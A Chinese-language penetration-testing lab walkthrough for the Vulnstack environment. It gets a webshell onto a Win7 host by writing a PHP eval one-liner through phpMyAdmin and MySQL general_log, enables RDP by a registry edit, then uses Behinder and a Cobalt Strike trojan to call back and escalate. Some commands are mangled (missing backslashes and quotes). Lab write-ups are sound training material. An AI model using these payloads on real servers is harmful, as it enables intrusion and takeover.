环境搭建：

靶场下载

靶场下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机通用密码： hongrisec@2019 登进去要修改密码，改为 HONGRISEC@2019

网卡配置

保证kali和本机可以访问win7，给win7配置两块网卡，让win7既可以访问外网，也可以访问内网 按照拓扑图搭建环境： 攻击机： kali ip: 192.168.70.128 靶机： win7 外网ip:192.168.70.129 内网ip:192.168.52.128 win03 ip: 192.168.52.141 win08 ip: 192.168.52.138

在win7上使用phpstudy开启web服务

外网渗透

信息收集;

先对win7进行常见端口扫描，可以看到开了两个服务，80端口的http服务和3306端口的mysql服务 一般看到MySQL就会想到phpmyadmin，然后弱口令试一下，搞一下目录扫描 直接用kali自带的dirb，发现70个结果，有很多phpmyadmin的目录，phpinfo.php

提权：

访问phpmyadmin，root/root 进入后台 没有发现什么有价值的东西，从phpinfo中可以看到网站的绝对路径，配合phpmyadmin尝试一下写入webshell

select <?php @eval($_POST[cmd])?>INTO OUTFILE C:phpStudyWWWshell.php

果然，无法写入，因为secure_file_priv的值为null ，表示限制mysql不允许导入|导出 换个思路，这个时候就可以利用(general_log、general_log file)日志文件getshell，general_log就是记录输入的日志文件，general_log file就是规定日志保存在哪个路径，我们只要输入一句话然后保存网站目录下的php文件就OK了。

执行
SHOW VARIABLES LIKE general%

开启它，设置general_log为on，并且把日志存放路径设置为网站根目录，这样就可以写入shell了

set global general_log = "ON";
SET global general_log_file=C:/phpStudy/WWW/shell.php;

更改后 写入shell

select <?php eval($_POST[cmd]);?>;

冰蝎连接

内网渗透

查看当前权限 远程登录 手动开启3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看端口状态

添加用户

使用冰蝎反弹shell到kali 参考这个：

https://blog..net/weixin_45745344/article/details/112321742

使用CS生成木马，通过冰蝎上传到服务器，看到权限为administrator，这里记得把回连时间改为0 使用插件梼杌进行权限提升，权限变成了system 域的话依然可以使用CS进行提权 结束